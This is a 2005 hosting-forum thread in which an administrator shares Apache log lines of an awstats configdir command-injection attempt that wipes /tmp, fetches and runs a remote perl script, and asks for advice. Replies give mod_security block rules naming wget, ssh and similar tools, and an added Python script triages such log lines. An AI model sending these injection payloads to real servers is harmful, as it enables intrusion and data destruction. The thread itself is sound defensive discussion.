My First hacking attempt


StingRay
08-23-2005, 12:46 PM
So I was looking through my access logs today and noticed the following.

63.251.232.60 - - [20/Aug/2005:06:01:31 -0700] "GET //awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/putnew/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 403 -
63.251.232.60 - - [20/Aug/2005:06:01:31 -0700] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/putnew/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 403 -
63.251.232.60 - - [20/Aug/2005:06:01:31 -0700] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/putnew/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 403 -
63.251.232.60 - - [20/Aug/2005:06:01:31 -0700] "GET /cgi/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/putnew/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 403 -
63.251.232.60 - - [20/Aug/2005:06:01:31 -0700] "GET /stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/putnew/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 403 -
63.251.232.60 - - [20/Aug/2005:06:01:32 -0700] "GET /stats/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/putnew/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 403 -
63.251.232.60 - - [20/Aug/2005:06:01:32 -0700] "GET /stats/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/putnew/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 403 -

Looks like they tried to use an exploit in awstats to attempt to compromise the server.
Being new to server administration, I'm wondering what steps I should take when I see things like this.

I do not currently have awstats on in WHM, so I don't think they would have been successful, but I do not know for certain.

Should I be looking closer at mod_security to make sure it is set up right? Is it configured by PowerVPS, or only basic defaults? Would mod_security handle this?


Looking for some informed advice :)

BornOnline
08-23-2005, 01:27 PM
Yes, mod_sec can stop these, but that would depend on the ruleset.

Mod_sec rules database (http://modsecrules.monkeydev.org/index.php)

Some of my rules

SecFilterSelective THE_REQUEST "system\("
SecFilterSelective THE_REQUEST "passthru\("
SecFilter "wget\x20"
SecFilter "uname\x20-a"
SecFilterSelective THE_REQUEST "/bin/ls"
SecFilterSelective THE_REQUEST "/usr/bin/id"
SecFilter "conf/httpd\.conf"
SecFilterSelective THE_REQUEST "///"
SecFilter "cd[[:space:]]/tmp"
SecFilter "cd[[:space:]]/var/tmp"
SecFilter "cd[[:space:]]/dev/shm"
SecFilter "gcc\x20-o"
SecFilter "cc\x20"
# Block various methods of downloading files to a server
SecFilterSelective THE_REQUEST "wget "
SecFilterSelective THE_REQUEST "lynx "
#SecFilterSelective THE_REQUEST "scp "
SecFilterSelective THE_REQUEST "ftp "
#SecFilterSelective THE_REQUEST "cvs "
#SecFilterSelective THE_REQUEST "rcp "
SecFilterSelective THE_REQUEST "telnet "
SecFilterSelective THE_REQUEST "ssh "
SecFilterSelective THE_REQUEST "echo "
SecFilterSelective THE_REQUEST "links -dump "
SecFilterSelective THE_REQUEST "links -dump-charset "
SecFilterSelective THE_REQUEST "links -dump-width "
SecFilterSelective THE_REQUEST "links http:// "
SecFilterSelective THE_REQUEST "links ftp:// "
SecFilterSelective THE_REQUEST "links -source "
SecFilterSelective THE_REQUEST "mkdir "
SecFilterSelective THE_REQUEST "cd /tmp "
SecFilterSelective THE_REQUEST "cd /var/tmp "
SecFilterSelective THE_REQUEST "cd /etc/httpd/proxy "
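
The script below is an added example for this thread, not code posted by StingRay, BornOnline or anyone else here. It does the two things the thread is about: it parses access-log lines like the ones in the first post, URL-decodes the request, recognises the awstats configdir shell-pipe shape and pulls out the injected commands and the second-stage download, and it then reports which of a handful of BornOnline's SecFilter rules (approximated as Python regexes) would have fired. It assumes mod_security 1.x sees the request after URL decoding, which is how its normalisation works; the rule list is a subset, not the full ruleset. The first sample line is taken from the thread; the other three lines in SAMPLE_LOG, and the 198.51.100.x / 203.0.113.x addresses in them, are constructed for the example.

```python
"""Triage Apache access-log lines for the awstats "configdir" command-injection probe.

Added example for this thread, not code posted in it. Assumes the common log
format shown in the first post; RULES approximates a few of the SecFilter
rules posted above as Python regexes, applied to the URL-decoded target
(mod_security 1.x decodes/normalises before matching). SAMPLE_LOG is
constructed for the example except for the first line.
"""
import re
from urllib.parse import unquote

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# The probe's shape: a shell pipe directly after configdir= in a request for awstats.pl.
INJECTION_RE = re.compile(r'awstats\.pl\?.*configdir=\|')

# Approximations of rules from the thread (mod_security 1.x syntax -> Python regex).
# Assumption: SecFilter and SecFilterSelective THE_REQUEST both see the decoded request.
RULES = {
    'SecFilter "wget\\x20"':                        re.compile(r'wget '),
    'SecFilter "cd[[:space:]]/tmp"':                re.compile(r'cd\s/tmp'),
    'SecFilterSelective THE_REQUEST "echo "':       re.compile(r'echo '),
    'SecFilterSelective THE_REQUEST "///"':         re.compile(r'///'),
    'SecFilterSelective THE_REQUEST "/usr/bin/id"': re.compile(r'/usr/bin/id'),
}


def parse_line(line):
    """Return a dict of fields for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['status'] = int(rec['status'])
    rec['decoded'] = unquote(rec['target'])   # %20 -> space, etc.
    return rec


def injected_commands(decoded_target):
    """Split the shell payload after 'configdir=|' into its individual commands."""
    payload = decoded_target.split('configdir=|', 1)[1]
    payload = payload.split('|', 1)[0]        # drop the closing pipe and anything after it
    return [c.strip() for c in payload.split(';') if c.strip()]


def matching_rules(decoded_target):
    """Names of the approximated SecFilter rules that would fire on this request."""
    return [name for name, rx in RULES.items() if rx.search(decoded_target)]


def triage(lines):
    """Return one finding per awstats configdir injection attempt in the log lines."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or not INJECTION_RE.search(rec['decoded']):
            continue
        cmds = injected_commands(rec['decoded'])
        findings.append({
            'ip': rec['ip'],
            'timestamp': rec['ts'],
            'status': rec['status'],
            'commands': cmds,
            # Second-stage download, if the payload fetches something with wget.
            'stage_url': next((c.split(None, 1)[1] for c in cmds if c.startswith('wget ')), None),
            'rules_hit': matching_rules(rec['decoded']),
            # 403 means Apache refused it; a 2xx means the CGI ran, so /tmp and
            # running perl processes deserve a look on that host.
            'served': 200 <= rec['status'] < 300,
        })
    return findings


SAMPLE_LOG = [
    # From the first post in the thread (Apache answered 403).
    '63.251.232.60 - - [20/Aug/2005:06:01:31 -0700] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/putnew/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 403 -',
    # Constructed: the same kind of probe on a host that served it (what a hit looks like).
    '198.51.100.7 - - [21/Aug/2005:02:14:09 -0700] "GET /awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://198.51.100.9/x.txt;perl%20x.txt;echo| HTTP/1.1" 200 1532',
    # Constructed: a legitimate awstats request, must not be flagged.
    '203.0.113.5 - - [21/Aug/2005:02:15:00 -0700] "GET /awstats/awstats.pl?config=example.com HTTP/1.1" 200 48120',
    # Constructed: garbage that does not parse, must be skipped.
    'not a log line',
]

if __name__ == '__main__':
    for f in triage(SAMPLE_LOG):
        print(f"{f['timestamp']} {f['ip']} status={f['status']} served={f['served']}")
        print("  commands:", f['commands'])
        print("  stage download:", f['stage_url'])
        print("  SecFilter rules that would fire:", f['rules_hit'])
```

Run it against a domlog and the interesting output is not the 403s but any line where `served` is True: that is the request that actually reached awstats. The second constructed line also shows why "depends on the ruleset" matters: the payload in it never contains "echo " so that rule stays quiet, and only the wget and `cd /tmp` filters catch it.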

charles
08-23-2005, 03:13 PM
Simple/dumb attacks like this are the reason we install mod_security and disable non-privileged use of wget by default.

canuck
08-23-2005, 06:57 PM
What log files do I check to see what's happening at my end?

Fred
08-23-2005, 07:03 PM
The Apache logs will show you this, canuck...

There are so many attempts like that... don't wake up at night for this or you'll never sleep, StingRay :)
You will notice the same for phpBB forums too...

In simple words, every popular web app that has a vulnerability.

canuck
08-23-2005, 07:26 PM
Are those logs located in the /var/log directory?

Fred
08-23-2005, 08:02 PM
I believe they are found in /usr/local/apache/domlogs??
You have separate files for each domain you host.
You can download the raw Apache log from WHM ... in "download a raw apache log".

But in /usr/local/apache/logs you can find error_log, where you'll find the errors for the whole server...

canuck
08-23-2005, 09:06 PM
Thanks, and yes, lots of stuff in these logs...